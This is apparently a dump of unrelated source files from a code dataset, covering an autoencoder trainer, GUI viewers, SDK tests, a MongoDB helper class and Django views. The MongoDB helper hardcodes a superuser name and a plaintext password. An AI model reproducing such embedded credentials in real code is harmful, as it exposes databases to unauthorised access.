cutout_size, cutout_size, l))\n while True:\n for i in tile_indices:\n img_group = hf.get(tile_ids[i] + \"/IMAGES\")\n wt_group = hf.get(tile_ids[i] + \"/WEIGHTS\")\n n_cutouts = len(img_group)\n for n in range(n_cutouts):\n sources[b,:,:,:] = np.array(img_group.get(f\"c{n}\"))[:,:,band_indices]\n weights[b,:,:,:] = np.array(wt_group.get(f\"c{n}\"))[:,:,band_indices]\n b += 1\n if b == batch_size:\n b = 0\n #yield (sources,sources)# no weights\n yield (np.concatenate((sources, weights), axis = -1), sources) #with weights\n \n \ndef train_autoencoder(hf, tile_ids, model, train_indices, val_indices, n_epochs, batch_size, cutout_size, all_callbacks, bands=\"all\"):\n n_cutouts_train = 0\n for i in 
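get_cutouts above is an infinite generator yielding (inputs, targets) pairs, where inputs carry the image and weight channels concatenated and the target is the image alone; that contract is why the fit() call below must cap each epoch with steps_per_epoch. A toy generator with the same contract (all shapes assumed):

import numpy as np

def toy_cutouts(batch_size=4, size=32, channels=1):
    while True:
        imgs = np.zeros((batch_size, size, size, channels))
        wts = np.ones((batch_size, size, size, channels))
        yield np.concatenate((imgs, wts), axis=-1), imgs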
train_indices:\n img_group = hf.get(tile_ids[i] + \"/IMAGES\") \n n_cutouts_train += len(img_group)\n \n n_cutouts_val = 0 \n for i in val_indices:\n img_group = hf.get(tile_ids[i] + \"/IMAGES\") \n n_cutouts_val += len(img_group)\n \n train_steps = n_cutouts_train // batch_size\n val_steps = n_cutouts_val // batch_size\n \n history = model.fit(get_cutouts(hf, tile_ids, train_indices, batch_size, cutout_size, bands), \n epochs=n_epochs, steps_per_epoch=train_steps, \n validation_data=get_cutouts(hf, tile_ids, val_indices, batch_size, cutout_size, bands), \n validation_steps=val_steps, callbacks= all_callbacks)\n return model, history\n\ndef create_autoencoder2(shape):\n input_all = keras.Input(shape=shape)\n weights = input_all[...,shape[-1]//2:]\n input_imgs = input_all[...,:shape[-1]//2]\n x = keras.layers.Conv2D(16, kernel_size=3, activation='relu', padding='same')(input_imgs)\n x = keras.layers.BatchNormalization()(x)\n x = keras.layers.Conv2D(32, kernel_size=3, activation='relu', padding='same')(x)\n x = keras.layers.BatchNormalization()(x)\n\n y = keras.layers.Conv2D(32, kernel_size=3, activation='relu', padding='same')(input_imgs)\n y = keras.layers.BatchNormalization()(y)\n encoded = keras.layers.Add()([x,y])\n \n x = keras.layers.Conv2DTranspose(32, kernel_size=4, activation='relu', padding='same')(encoded)\n x = keras.layers.Conv2DTranspose(16, kernel_size=4, activation='relu', padding='same')(x)\n \n #weights\n decoded_img = keras.layers.Conv2D(shape[2] // 2, kernel_size=3, activation='linear', padding='same')(x)\n decoded_all = tf.concat([decoded_img, weights], axis = -1)\n \n #no weights\n #decoded_all = keras.layers.Conv2D(shape[2], kernel_size=3,activation='relu', padding = 'same')(x) \n \n return keras.Model(input_all, decoded_all)\n\n\nbands = 1\ndef masked_MSE_with_uncertainty(y_true, y_pred): \n weights = y_pred[...,bands:] \n y_pred_image = y_pred[...,:bands]\n \n return K.square(tf.math.multiply((y_true - y_pred_image), weights) )\n #return K.square(tf.math.multiply((y_true - y_pred), 1) ) #no weights\n #return tf.abs(K.square(tf.math.multiply((y_true - y_pred_image), weights) ) - b) + b #weights","sub_path":"Code/Batch Loading/Currently used/job_scripts/func_job3.py","file_name":"func_job3.py","file_ext":"py","file_size_in_byte":5849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"38974609","text":"\"\"\"\nLoads the data from the data directory, and plots it in a canvas for eazy labeling\n\"\"\"\nimport tkinter as tk\nimport json\n\n# Tkinter class\nclass Application(tk.Frame):\n def __init__(self, master=None):\n super().__init__(master)\n self.pack()\n self.createWidgets()\n self.loadelements()\n\n def createWidgets(self):\n self.panelframe = tk.Frame(self, width=1500, height=600)\n self.panel = tk.Canvas(self.panelframe, width=1500, height=600, scrollregion=(0,0,100000,5000))\n\n self.hbar = tk.Scrollbar(self.panelframe, orient=tk.HORIZONTAL)\n self.hbar.pack(side='bottom', fill='x')\n self.hbar.config(command=self.panel.xview)\n\n self.vbar = tk.Scrollbar(self.panelframe, orient=tk.VERTICAL)\n self.vbar.pack(side='right', fill='y')\n self.vbar.config(command=self.panel.yview)\n\n self.panel.config(xscrollcommand=self.hbar.set, yscrollcommand=self.vbar.set)\n self.panel.pack()\n\n self.panelframe.pack()\n\n def loadelements(self):\n with open('../data/unlabelled/www.rtvdrenthe.nl.json', 'r') as infile:\n self.elements = json.loads(infile.read())\n self.drawElements(self.elements)\n\n def drawElements(self, 
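elements):\n        # Draw each element as a filled rectangle labelled with its tag and text.\n        # (Note: the two create_text calls share an anchor, so the labels overlap.)\n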
        for element in elements:\n            bounds = element['bounds']\n            top = (bounds['top'])\n            left = (bounds['left'])\n            endtop = (top + bounds['height'])\n            endleft = (left + bounds['width'])\n            self.panel.create_rectangle(left, top, endleft, endtop, fill=\"blue\")\n            self.panel.create_text(left, top, anchor=\"nw\",text=element['info']['tag'])\n            self.panel.create_text(left, top, anchor=\"nw\",text=element['info']['text'])\n\nif __name__ == \"__main__\":\n    print('hello world')\n    root = tk.Tk()\n    app = Application(master=root)\n    app.mainloop()\n","sub_path":"src/displaydata.py","file_name":"displaydata.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"211184370","text":"# Created by Shlyankin Nickolay\nfrom PyQt5 import QtWidgets\nfrom mydesign import Ui_MainWindow\nfrom util import Task\nimport pyqtgraph as pg\nimport sys\n\nclass mywindow(QtWidgets.QMainWindow):\n    def __init__(self):\n        super(mywindow, self).__init__()\n        self.task = None\n        self.ui = Ui_MainWindow()\n        self.ui.setupUi(self)\n        self.graphWidget = pg.PlotWidget()\n        self.ui.layoutGraph.addWidget(self.graphWidget)\n        self.graphWidget.setBackground('w')\n        self.graphWidget.setLabel('left', 'Температура (К)', color='red', size=30)\n        self.graphWidget.setLabel('bottom', 'Радиус (см)', color='red', size=30)\n        self.ui.sliderImage.valueChanged.connect(self.plotNextGraph)\n        self.ui.buttonCaluclate.clicked.connect(self.calculate)\n        self.ui.buttonClear.clicked.connect(self.clear)\n        self.l = pg.LegendItem((160,60), offset=(430,10))\n        self.l.setParentItem(self.graphWidget.graphicsItem())\n\n\n    def clear(self):\n        self.ui.edit_R.setText(\"\")\n        self.ui.edit_l.setText(\"\")\n        self.ui.edit_k.setText(\"\")\n        self.ui.edit_c.setText(\"\")\n        self.ui.edit_T.setText(\"\")\n        self.ui.edit_Uc.setText(\"\")\n        self.ui.edit_alpha.setText(\"\")\n        self.ui.edit_K.setText(\"\")\n        self.ui.edit_I.setText(\"\")\n        self.graphWidget.clear()\n        self.task = None\n        self.ui.label_gridInfo.setStyleSheet(\"color: rgb(0, 0, 0);\")\n        self.ui.label_gridInfo.setText(\"\")\n        self.ui.label_max_t.setText(\"0\")\n        self.ui.sliderImage.setMaximum(0)\n        self.ui.label_current_time.setText(\"Индекс времени k = \")\n        self.ui.label_current_time_2.setText(\"Время t = \")\n\n    def legend_del(self):\n        while(len(self.l.items)):\n            item, label = self.l.items[0]\n            self.l.items.remove((item, label))  # remove the line entry\n            self.l.layout.removeItem(item)\n            item.close()\n            self.l.layout.removeItem(label)  # remove the label\n            label.close()\n        self.l.updateSize()\n\n    def calculate(self):\n        self.ui.label_gridInfo.setStyleSheet(\"color: rgb(0, 0, 0);\")\n        self.ui.label_gridInfo.setText(\"\")\n        try:\n            R = float(self.ui.edit_R.text())\n            l = float(self.ui.edit_l.text())\n            k = float(self.ui.edit_k.text())\n            c = float(self.ui.edit_c.text())\n            T = float(self.ui.edit_T.text())\n            Uc = float(self.ui.edit_Uc.text())\n            alpha = float(self.ui.edit_alpha.text())\n            K = int( self.ui.edit_K.text())\n            I = int( self.ui.edit_I.text())\n            self.ui.label_gridInfo.setStyleSheet(\"color: rgb(255, 0, 0);\")\n            self.ui.label_gridInfo.setText(\"Идут вычисления. 
Подождите.\")\n self.task = Task(R, l, k, c, alpha, T, Uc, K, I)\n answer = self.task.calculate()\n answer_analytic = self.task.analytic_decision()\n self.ui.label_gridInfo.setText(\"Готово!\")\n y = answer[0]\n x = self.task.r\n self.ui.sliderImage.setValue(0)\n self.ui.label_max_t.setText(str(len(answer) - 1))\n self.ui.sliderImage.setMaximum(len(answer) - 1)\n self.graphWidget.clear()\n self.legend_del()\n self.ui.label_current_time.setText(\"Индекс времени k = \" + str(0))\n self.ui.label_current_time_2.setText(\"Время t = \" + str(0) + \" c\")\n self.plotGraph(x, answer_analytic[0], \"Аналитическое решение при t=0\", 'b')\n self.plotGraph(x, y, \"Кранка-Николсона при t=0\", 'r')\n self.ui.label_gridInfo.setText(self.ui.label_gridInfo.text() +\n \"\\nabsolute error: \" + str(self.task.calculateAbsError()) +\n \"\\nРешение устойчиво: \" + str(self.task.isStable()) +\n \"\\nhr = \" + str(self.task.hr) + \"\\tht = \" + str(self.task.ht)\n )\n\n except ValueError:\n self.ui.label_gridInfo.setStyleSheet(\"color: rgb(255, 0, 0);\")\n self.ui.label_gridInfo.setText(\"Проверьте поля!\")\n\n def plotNextGraph(self):\n self.legend_del()\n t = self.ui.sliderImage.value()\n self.ui.label_current_time.setText(\"Индекс времени k = \" + str(t))\n self.ui.label_current_time_2.setText(\"Время t = \" + str(round(t*self.task.ht, 2)) + \" c\")\n if(self.task != None):\n y = self.task.answer[t]\n x = self.task.r\n self.graphWidget.clear()\n self.plotGraph(x, self.task.answer_analytic[t], \"Аналитическое решение при t=\"+str(round(t*self.task.ht, 1))+\" c\", 'b')\n self.plotGraph(x, y, \"Кранка-Николсона при t=\"+str(round(t*self.task.ht, 1))+\" c\", 'r')\n\n def plotGraph(self, x, y, plotname, color):\n self.graphWidget.showGrid(x=True, y=True)\n pen = pg.mkPen(color=color, width=3)\n self.l.addItem(self.graphWidget.plot(x, y, name=plotname, pen=pen), plotname)\n\n\n\napp = QtWidgets.QApplication([])\napplication = mywindow()\napplication.show()\n\nsys.exit(app.exec())\n\n","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":5397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"112009590","text":"import pytest\n\nfrom stellar_sdk import Asset\nfrom stellar_sdk.call_builder.call_builder_async import TradeAggregationsCallBuilder\nfrom stellar_sdk.exceptions import ValueError\nfrom tests.call_builder.call_builder_async import client, horizon_url\n\n\nclass TestTradeAggregationsCallBuilder:\n def test_init(self):\n base = Asset(\"XCN\", \"GCOMOKXUA4TAEBB2QDHZD53SNRWKNTJMVEFLE47JYN5HS7KNLOABVA4Z\")\n counter = Asset.native()\n resolution = 300000\n builder = TradeAggregationsCallBuilder(\n horizon_url, client, base=base, counter=counter, resolution=resolution\n )\n assert builder.endpoint == \"trade_aggregations\"\n assert builder.params == {\n \"base_asset_type\": base.type,\n \"base_asset_code\": base.code,\n \"base_asset_issuer\": base.issuer,\n \"counter_asset_type\": counter.type,\n \"resolution\": str(resolution),\n }\n\n def test_invalid_resolution_raise(self):\n base = Asset(\"XCN\", \"GCOMOKXUA4TAEBB2QDHZD53SNRWKNTJMVEFLE47JYN5HS7KNLOABVA4Z\")\n counter = Asset.native()\n resolution = 1000\n with pytest.raises(\n ValueError, match=\"Invalid resolution: {}\".format(resolution)\n ):\n TradeAggregationsCallBuilder(\n horizon_url, client, base=base, counter=counter, resolution=resolution\n )\n\n def test_invalid_offset_raise(self):\n base = Asset(\"XCN\", \"GCOMOKXUA4TAEBB2QDHZD53SNRWKNTJMVEFLE47JYN5HS7KNLOABVA4Z\")\n counter 
        resolution = 300000\n        offset = 600000\n        with pytest.raises(ValueError, match=\"Invalid offset: {}\".format(offset)):\n            TradeAggregationsCallBuilder(\n                horizon_url,\n                client,\n                base=base,\n                counter=counter,\n                resolution=resolution,\n                offset=offset,\n            )\n","sub_path":"tests/call_builder/call_builder_async/test_trades_aggregation_call_builder.py","file_name":"test_trades_aggregation_call_builder.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"433517266","text":"def bazz (num):\r\n    if num%3 == 0 and num%5 != 0:\r\n        print(\"bazz\")\r\n\r\n    elif num%5 == 0 and num%3 !=0:\r\n        print(\"buzz\")\r\n\r\n    elif num%3 == 0 and num%5 == 0:\r\n        print(\"bazzbuzz\")\r\n\r\nfor x in range (1, 100) :\r\n    num = x\r\n    print(x)\r\n    bazz(num)\r\n","sub_path":"bazz.py","file_name":"bazz.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"587323002","text":"# coding:utf-8\n\n\"\"\"\nCreated on 2016-05-17\n\n@author: shane\n\"\"\"\n\nimport logging\nfrom datetime import datetime\n\nfrom pymongo import MongoClient\nimport gridfs\n\nGRIDFS_ERROR_CORRUPTGRIDFILE = '[Gridfs Error CorruptGridFile]'\nGRIDFS_ERROR_NOFILE = '[Gridfs Error NoFile]'\nGRIDFS_ERROR_FILEEXISTS = '[Gridfs Error FileExists]'\nGRIDFS_ERROR_GRIDFSERROR = '[Gridfs Error GridFsError]'\nOTHER_EXCEPTION = 'other exception:'\n\nuser = 'superuser'\npassword = 'hgd77287987'\nauthorization_db = 'admin'\n\n\nclass MongoHandler:\n\t\"\"\"\n\tThin wrapper class around MongoClient operations.\n\t\"\"\"\n\n\tdef __init__(self, uri=None):\n\t\t\"\"\"\n\n\t\t:param ip:\n\t\t:param port:\n\t\t:param auth:\n\t\t\"\"\"\n\t\tself._logger = logging.getLogger('mongo')\n\t\tif uri is None:\n\t\t\tip = 'localhost'\n\t\t\tport = 27017\n\n\t\t# uri = 'mongodb://' + user + ':' + password + '@' + ip + ':' + str(port) + '/' + authorization_db\n\t\tself._client = MongoClient(uri)\n\n\t\tself._inserted = 0\n\t\tself._updated = 0\n\t\tself._ignored = 0\n\n\t\tself._logger.info('MongoHandler initialized')\n\n\tdef get_status(self):\n\t\t\"\"\"\n\t\tReturn counters for Mongo operations: inserted, updated and ignored record counts.\n\t\t:return: \n\t\t\"\"\"\n\t\treturn {'inserted': self._inserted, 'updated': self._updated, 'ignored': self._ignored}\n\n\tdef insert_crawler_status(self, db_name, status_info):\n\t\tstatus_info['inserted'] = self._inserted\n\t\tstatus_info['updated'] = self._updated\n\t\tstatus_info['ignored'] = self._ignored\n\n\t\tdb = self._client[db_name]\n\t\tcollection = db['CrawlerStatus']\n\t\tcollection.insert_one(status_info)\n\n\tdef count(self, db_name, collection_name, filter_dict):\n\t\t'''\n\t\tCount the documents matching the filter.\n\n\t\tArgs:\n\t\t\tdb_name: database name\n\t\t\tcollection_name: collection name\n\t\t\tfilter_dict: filter criteria dict\n\n\t\tReturns:\n\t\t\tthe number of matching documents\n\t\t'''\n\t\tdb = self._client[db_name]\n\t\tcollection = db[collection_name]\n\t\treturn collection.count(filter_dict)\n\n\tdef find(self, db_name, collection_name, filter_dict, multi):\n\t\t'''\n\t\tQuery documents.\n\n\t\tArgs:\n\t\t\tdb_name: database name\n\t\t\tcollection_name: collection name\n\t\t\tfilter_dict: filter criteria dict\n\t\t\tmulti: whether to fetch multiple documents\n\n\t\tReturns:\n\t\t\ta list of document dicts if multi is True; otherwise a single document\n\t\t'''\n\t\t# self._logger.debug('finding')\n\n\t\tdb = self._client[db_name]\n\t\tcollection = db[collection_name]\n\t\tif (multi):\n\t\t\treturn self.find_many(db_name, collection_name, filter_dict, None)\n# \t\t\tary = []\n# \t\t\tfor data in collection.find(filter_dict):\n# \t\t\t\tary.append(data)\n\t\t#\n# \t\t\treturn ary\n
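\t\t# Hedged usage sketch (the db/collection names below are assumptions):\n\t\t#   handler = MongoHandler('mongodb://localhost:27017')\n\t\t#   one_doc  = handler.find('crawl_db', 'Articles', {'status': 'new'}, multi=False)\n\t\t#   all_docs = handler.find('crawl_db', 'Articles', {'status': 'new'}, multi=True)\n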
\t\telse:\n\t\t\treturn collection.find_one(filter_dict)\n\n\tdef find_many(self, db_name, collection_name, filter_dict, projection, page=1, limit=0):\n\t\t'''\n\t\tQuery documents.\n\n\t\tArgs:\n\t\t\tdb_name: database name\n\t\t\tcollection_name: collection name\n\t\t\tfilter_dict: filter criteria dict\n\t\t\tprojection: which fields to include or exclude in the result\n\t\t\tpage: page number to start from\n\t\t\tlimit: number of documents per page\n\n\t\tReturns:\n\t\t\ta list of document dicts\n\t\t'''\n\n\t\tdb = self._client[db_name]\n\t\tcollection = db[collection_name]\n\n\t\tskip = page * limit\n\t\tcursor = collection.find(filter=filter_dict, skip=skip, limit=limit, no_cursor_timeout=True,\n\t\t                         projection=projection)\n\t\tary = list(cursor)\n\t\tcursor.close()\n\t\t# for data in collection.find(filter=filter_dict, skip=skip, limit=limit):\n\t\t#     ary.append(data)\n\n\t\treturn ary\n\n\tdef find_object_id(self, db_name, collection_name, filter_dict):\n\t\t'''\n\t\tGet the ObjectId of the single document matching the filter.\n\n\t\tArgs:\n\t\t\tdb_name: database name\n\t\t\tcollection_name: collection name\n\t\t\tfilter_dict: filter criteria dict\n\n\t\tReturns:\n\t\t\tthe _id ObjectId if a document is found, otherwise None\n\t\t'''\n\n\t\tdoc = self.find(db_name, collection_name, filter_dict, False)\n\t\tif doc is not None:\n\t\t\treturn doc['_id']\n\t\telse:\n\t\t\treturn None\n\n\tdef delete(self, db_name, collection_name, filter_dict, multi):\n\t\t'''\n\t\tDelete documents.\n\n\t\tArgs:\n\t\t\tdb_name: database name\n\t\t\tcollection_name: collection name\n\t\t\tfilter_dict: filter criteria dict\n\t\t\tmulti: True deletes every matching document; otherwise only one\n\t\t'''\n\t\tself._logger.debug('deleting')\n\n\t\tdb = self._client[db_name]\n\t\tcollection = db[collection_name]\n\t\tif multi:\n\t\t\tcollection.delete_many(filter_dict)\n\t\telse:\n\t\t\tcollection.delete_one(filter_dict)\n\n\tdef insert_many(self, db_name, collection_name, records, identifiers):\n\t\t'''\n\t\tInsert multiple records, with the following behavior per record:\n\t\t\t1. if the record does not exist, insert it\n\t\t\t2. if it exists and has changed, update it\n\t\t\t3. if it exists and is unchanged, ignore it\n\n\t\tArgs:\n\t\t\tdb_name: database name\n\t\t\tcollection_name: collection name\n\t\t\trecords: list of data dicts to insert\n\t\t\tidentifiers: list of fields treated as the unique key, used to detect duplicates\n\t\t'''\n\t\tself._logger.debug('inserting many')\n\n\t\tfor record in records:\n\t\t\tself.insert_one(db_name, collection_name, record, identifiers)\n\n\tdef insert_many2(self, db_name, collection_name, records, identifiers):\n\t\t'''\n\t\tInsert multiple records unconditionally, stamping create/update times.\n\t\t'''\n\t\tself._logger.debug('inserting many 2')\n\n\t\tdb = self._client[db_name]\n\t\tcollection = db[collection_name]\n\t\tfor record in records:\n\t\t\ttoday = datetime.today()\n\t\t\trecord['createTime'] = today\n\t\t\trecord['updateTime'] = today\n\n\t\tcollection.insert_many(records)\n\n\tdef insert_one(self, db_name, collection_name, record, identifiers):\n\t\t'''\n\t\tInsert a single record, with the following behavior:\n\t\t\t1. if the record does not exist, insert it\n\t\t\t2. if it exists and has changed, update it\n\t\t\t3. if it exists and is unchanged, ignore it\n\n\t\tArgs:\n\t\t\tdb_name: database name\n\t\t\tcollection_name: collection name\n\t\t\trecord: data dict to insert\n\t\t\tidentifiers: list of fields treated as the unique key, used to detect duplicates\n\t\t'''\n\t\t# self._logger.debug('inserting one')\n\n\t\tdb = self._client[db_name]\n\t\tcollection = db[collection_name]\n\t\ttoday = datetime.today()\n\n\t\tfilter_dict = {}\n\t\tfor field in identifiers:\n\t\t\tfilter_dict[field] = record[field]\n\n\t\tdoc = self.find(db_name, collection_name, filter_dict, False)\n\t\tif doc is None:\n\t\t\trecord['createTime'] = today\n\t\t\trecord['updateTime'] = today\n\t\t\tcollection.insert_one(record)\n\t\t\tself._inserted += 1\n\t\telse:\n\t\t\tself._check_and_update(db_name, collection_name, doc, record)\n\n
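\t# Hedged example of the upsert-style behavior above (field names assumed):\n\t#   handler.insert_one('crawl_db', 'Articles', {'url': u, 'title': t}, ['url'])\n\t#   -> inserts when no doc has this url, updates changed fields, else ignores.\n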
\tdef _check_and_update(self, db_name, collection_name, doc, record):\n\t\t'''\n\t\tCheck the stored document and update only the fields that changed; otherwise do nothing.\n\t\tNB: only the crawled fields are compared; all other fields are ignored so that\n\t\tpost-processed fields are not clobbered by mistake.\n\n\t\tArgs:\n\t\t\tdb_name: database name\n\t\t\tcollection_name: collection name\n\t\t\tdoc: the document dict fetched from the DB\n\t\t\trecord: the data dict to compare against\n\t\t'''\n\t\t# self._logger.debug('checking and updating')\n\n\t\tupdate_logs = []\n\t\tupdate_dict = {}\n\n\t\tfor key in record.keys():\n\t\t\tif key not in doc.keys() or doc[key] != record[key]:\n\t\t\t\told = None\n\t\t\t\tif key in doc.keys():\n\t\t\t\t\told = repr(doc[key])\n\t\t\t\tupdate_logs.append({'field': key, 'old': old, 'new': repr(record[key])})\n\t\t\t\tupdate_dict[key] = record[key]\n\n\t\tif len(update_dict) > 0:\n\t\t\t# self._logger.debug('update')\n\t\t\tdb = self._client[db_name]\n\t\t\tcollection = db[collection_name]\n\t\t\ttoday = datetime.today()\n\n\t\t\t# update the changed fields\n\t\t\tupdate_dict['updateTime'] = today\n\t\t\tcollection.update_one({'_id': doc['_id']}, {'$set': update_dict})\n\t\t\tself._updated += 1\n\n\t\t# status logging (disabled)\n\t\t# log_dict = {'createTime': today, 'collection': collection_name, 'objId': doc['_id'], 'logs': update_logs}\n\t\t# log_collection = db['CrawlerLog']\n\t\t# log_collection.insert_one(log_dict)\n\t\telse:\n\t\t\t# self._logger.debug('Ignore')\n\t\t\tself._ignored += 1\n\n\tdef gridfs_upload_from_stream(self, db_name, grid_fs_bucket, filename, source, metadata):\n\t\t'''\n\t\treturn file id\n\t\t'''\n\t\tdb = self._client[db_name]\n\t\ttry:\n\t\t\tfsbk = gridfs.GridFSBucket(db, grid_fs_bucket)\n\t\t\tfile_id = fsbk.upload_from_stream(filename, source, metadata=metadata)\n\t\t\treturn file_id\n\t\t# log each gridfs error under its matching label\n\t\texcept gridfs.errors.NoFile as e:\n\t\t\tself._logger.exception(GRIDFS_ERROR_NOFILE + str(e))\n\t\t\treturn None\n\t\texcept gridfs.errors.FileExists as e:\n\t\t\tself._logger.exception(GRIDFS_ERROR_FILEEXISTS + str(e))\n\t\t\treturn None\n\t\texcept gridfs.errors.CorruptGridFile as e:\n\t\t\tself._logger.exception(GRIDFS_ERROR_CORRUPTGRIDFILE + str(e))\n\t\t\treturn None\n\t\texcept gridfs.errors.GridFSError as e:\n\t\t\tself._logger.exception(GRIDFS_ERROR_GRIDFSERROR + str(e))\n\t\t\treturn None\n\t\texcept Exception as e:\n\t\t\tself._logger.exception(OTHER_EXCEPTION + str(e))\n\t\t\treturn None\n\t\telse:\n\t\t\tpass\n\n\tdef distinct(self, db_name, collection_name, data_filter, key):\n\t\t\"\"\"\n\n\t\t:param db_name:\n\t\t:param collection_name:\n\t\t:param data_filter:\n\t\t:param key:\n\t\t:return:\n\t\t\"\"\"\n\t\tdb = self._client[db_name]\n\t\tcollection = db[collection_name]\n\n\t\treturn collection.distinct(key, data_filter)\n\n\tdef aggregate(self, db_name, collection_name, data_filter):\n\t\t\"\"\"\n\n\t\t:param db_name:\n\t\t:param collection_name:\n\t\t:param data_filter:\n\t\t:param key:\n\t\t:return:\n\t\t\"\"\"\n\t\tdb = self._client[db_name]\n\t\tcollection = db[collection_name]\n\n\t\treturn list(collection.aggregate(data_filter))\n\n\tdef data_check(self, db_name, collection_name, data_filter, multi, flag):\n\t\t\"\"\"\n\t\tcheck whether matching data exists\n\t\t:param db_name:\n\t\t:param collection_name:\n\t\t:param data_filter:\n\t\t:param multi:\n\t\t:param flag:\n\t\t:return: list or doc\n\t\t\"\"\"\n\t\tif flag == \"DEBUG\":\n\t\t\treturn self.find(db_name, collection_name, data_filter, multi)\n\n\tdef data_confirm(self, db_name, collection_name, docs, identifiers, flag):\n\t\t\"\"\"\n\t\tif data confirmation is wanted and flag is DEBUG, the data is inserted into the db for confirmation\n\t\t:param db_name:\n\t\t:param collection_name:\n\t\t:param docs:\n\t\t:param identifiers:\n\t\t:param flag:\n\t\t:return:\n\t\t\"\"\"\n\t\t# print(\"flag:\", flag)\n\t\tif flag == \"DEBUG\":\n
self._logger.debug(\"data confirm debug\")\n\t\t\tif type(docs) is list:\n\t\t\t\tfor doc in docs:\n\t\t\t\t\tself.insert_one(db_name, collection_name, doc, identifiers)\n\t\t\telse:\n\t\t\t\tself.insert_one(db_name, collection_name, docs, identifiers)\n\n\tdef get_cursor(self, db_name, collection_name, data_filter):\n\t\t\"\"\"\n\t\t*attention* the cursor that return is no timeout, so remember close this cursor\n\t\t:param db_name:\n\t\t:param collection_name:\n\t\t:param data_filter:\n\t\t:return: a pymongo cursor\n\t\t\"\"\"\n\t\tdb = self._client[db_name]\n\t\tcollection = db[collection_name]\n\t\treturn collection.find(data_filter, no_cursor_timeout=True)\n\n\tdef close_disconnect(self):\n\t\tself._client.close()\n\n\tdef project(self, db_name, collection_name, data_filter, projection):\n\t\t\"\"\"\n\t\t*attention* the cursor that return is no timeout, so remember close this cursor\n\t\t:param db_name:\n\t\t:param collection_name:\n\t\t:param data_filter:\n\t\t:param projection:\n\t\t:return: cursor_list\n\t\t\"\"\"\n\t\tif db_name in self._client.database_names():\n\t\t\tdb = self._client[db_name]\n\t\telse:\n\t\t\treturn []\n\n\t\tif collection_name in db.collection_names():\n\t\t\tcollection = db[collection_name]\n\t\telse:\n\t\t\treturn []\n\t\tcursor = collection.find(filter=data_filter, projection=projection, no_cursor_timeout=True)\n\t\tcursor_list = list(cursor)\n\t\tcursor.close()\n\t\treturn cursor_list\n\n\tdef projection_one(self, db_name, collection_name, data_filter, projection):\n\t\t\"\"\"\n\n\t\t:param db_name:\n\t\t:param collection_name:\n\t\t:param data_filter:\n\t\t:param projection:\n\t\t:return:\n\t\t\"\"\"\n\t\tif db_name in self._client.database_names():\n\t\t\tdb = self._client[db_name]\n\t\telse:\n\t\t\treturn None\n\n\t\tif collection_name in db.collection_names():\n\t\t\tcollection = db[collection_name]\n\t\telse:\n\t\t\treturn None\n\n\t\tdoc = collection.find_one(filter=data_filter, projection=projection)\n\t\treturn doc\n\n\tdef collection_names(self, db_name=None):\n\t\t\"\"\"\n\n\t\t:param db_name:\n\t\t:return:\n\t\t\"\"\"\n\t\treturn self._client[db_name].collection_names()\n\n\tdef client(self):\n\t\treturn self._client\n","sub_path":"pmi/bigfour/Fresh/BitSpace/utility/mongo.py","file_name":"mongo.py","file_ext":"py","file_size_in_byte":11397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"564025963","text":"import os\n\nbaseDir = os.path.dirname(os.path.dirname(__file__))\n#print(baseDir,type(baseDir))\nexcelPath = baseDir+'/TestData/inter_test_data.xlsx'\n#print(excelPath)\napiExcelName='API'\n# 测试数据excel文件中,API表中列号数字映射\nAPI_apiName = 2\nAPI_requestUrl = 3\nAPI_requestMothod = 4\nAPI_paramsType = 5\nAPI_apiTestCaseFileName = 6\nAPI_active = 7\n\n# 测试数据excel文件中,API的测试用例表中的列号数字映射\nCASE_requestData = 1\nCASE_relyData = 2\nCASE_responseCode = 3\nCASE_responseData = 4\nCASE_dataStore = 5\nCASE_checkPoint = 6\nCASE_active = 7\nCASE_status = 8\nCASE_errorInfo = 9\n\n# 存储请参数里面依赖数据\nREQUEST_DATA = {}\n\n# 存储响应对象中的依赖数据\nRESPONSE_DATA = {}\n","sub_path":"config/public_data.py","file_name":"public_data.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"8953091","text":"import os\nimport json\nimport time\nfrom django.views.generic import TemplateView, View\nfrom django.conf import settings\nfrom json import encoder\nfrom django.http import HttpResponse, JsonResponse\nfrom stsimpy import STSimConsole\nfrom 
PIL import Image\nfrom OutputProcessing import texture_utils\n\n# Two decimal places when dumping to JSON\nencoder.FLOAT_REPR = lambda o: format(o, '.2f')\n\n# Declare the stsim console we want to work with\nstsim = STSimConsole(lib_path=settings.ST_SIM_WORKING_LIB,\n orig_lib_path=settings.ST_SIM_ORIG_LIB,\n exe=settings.ST_SIM_EXE)\n\n# TODO - need a way to initialize various stsim consoles\nspatial_stsim = STSimConsole(\n lib_path=os.path.join(settings.ST_SIM_WORKING_DIR, 'libraries', 'ST-Sim-Spatial-Sample-V2-4-6.ssim'),\n orig_lib_path=os.path.join(settings.ST_SIM_WORKING_DIR, 'libraries', 'ST-Sim-Spatial-Sample-V2-4-6_orig.ssim'),\n exe=settings.ST_SIM_EXE)\ndefault_run_control_path = os.path.join(settings.ST_SIM_WORKING_DIR, 'run_control', 'run_ctrl.csv')\n\n# Defaults for this library. Run once and hold in memory.\ndefault_sid = stsim.list_scenarios()[0]\ndefault_sc_path = os.path.join(settings.ST_SIM_WORKING_DIR, 'state_classes', 'state_classes.csv')\ndefault_transitions_path = os.path.join(settings.ST_SIM_WORKING_DIR, 'probabilistic_transitions', 'original','prob_trans.csv')\nall_veg_state_classes = stsim.export_veg_state_classes(default_sid,\n state_class_path=default_sc_path)\nall_transition_types = stsim.export_probabilistic_transitions_types(default_sid,\n transitions_path=default_transitions_path)\n\n\nclass HomepageView(TemplateView):\n\n template_name = 'index.html'\n\n def get_context_data(self, **kwargs):\n context = super(HomepageView, self).get_context_data(**kwargs)\n\n # veg state classes\n context['veg_type_state_classes_json'] = json.dumps(all_veg_state_classes)\n\n # our probabilistic transition types for this 